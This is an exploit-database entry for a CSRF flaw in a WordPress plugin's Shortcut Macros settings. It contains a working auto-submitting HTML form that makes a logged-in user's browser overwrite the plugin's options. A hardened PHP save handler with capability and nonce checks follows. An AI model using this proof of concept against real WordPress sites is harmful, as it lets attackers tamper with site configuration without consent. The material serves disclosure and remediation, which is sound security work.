## https://sploitus.com/exploit?id=WPEX-ID:EF6D0393-0CE3-465C-84C8-53BF8C58958A
Open the following HTML while logged in as a subscriber, or get any logged-in user to open it (a CSRF attack):

```html
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="ak_action" value="update_aksm_settings">
    <input type="text" name="aksm_k_1" value="aaa">
    <input type="text" name="aksm_v_1" value="hacked">
    <input type="text" name="submit_button" value="Update Shortcut Macros">
</form>
<script>
    document.getElementById("test").submit();
</script>
```

Note: Even though an error can occur, i.e. "Sorry, you are not allowed to access this page.", the settings will still be changed.
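
The behaviour above (a subscriber's POST, or a forged cross-site POST, changes the settings even when the page itself is refused) points to a save handler that checks neither the user's capability nor a nonce. The following is an added example of a hardened handler, not the plugin's own code: the `ak_action` and `aksm_k_N` / `aksm_v_N` field names come from the form above, while every `example_`-prefixed name, the option name and the use of the `admin_init` hook are assumptions.

```php
<?php
// Added example: hypothetical hardened save handler. Names prefixed
// example_/EXAMPLE_ are assumptions, not taken from the plugin's source.
const EXAMPLE_AKSM_NONCE_ACTION = 'example_aksm_update_settings';
const EXAMPLE_AKSM_NONCE_FIELD  = 'example_aksm_nonce';
const EXAMPLE_AKSM_OPTION       = 'example_aksm_macros';

add_action( 'admin_init', 'example_aksm_handle_settings_update' );

function example_aksm_handle_settings_update() {
    // Only act on the settings form's own POST.
    if ( 'POST' !== ( $_SERVER['REQUEST_METHOD'] ?? '' )
        || 'update_aksm_settings' !== ( $_POST['ak_action'] ?? '' ) ) {
        return;
    }

    // Authorization: admin_init runs for every logged-in user who requests a
    // /wp-admin/ URL, before WordPress decides whether that user may view the
    // page, so the handler has to check the capability itself.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Sorry, you are not allowed to change these settings.', '', array( 'response' => 403 ) );
    }

    // CSRF: dies unless the request carries a valid nonce for this action.
    check_admin_referer( EXAMPLE_AKSM_NONCE_ACTION, EXAMPLE_AKSM_NONCE_FIELD );

    // Collect aksm_k_N / aksm_v_N pairs, accepting only string values.
    $macros = array();
    foreach ( $_POST as $field => $value ) {
        if ( ! preg_match( '/^aksm_k_(\d+)$/', $field, $m ) || ! is_string( $value ) ) {
            continue;
        }
        $key = sanitize_text_field( wp_unslash( $value ) );
        $val = $_POST[ 'aksm_v_' . $m[1] ] ?? '';
        if ( '' !== $key && is_string( $val ) ) {
            $macros[ $key ] = sanitize_text_field( wp_unslash( $val ) );
        }
    }
    update_option( EXAMPLE_AKSM_OPTION, $macros );
}

// Call inside the settings <form> so legitimate submissions carry the nonce.
function example_aksm_render_nonce_field() {
    wp_nonce_field( EXAMPLE_AKSM_NONCE_ACTION, EXAMPLE_AKSM_NONCE_FIELD );
}
```

With both checks in place, the auto-submitting form above fails twice: a subscriber lacks `manage_options`, and a forged request from another origin cannot supply a valid nonce.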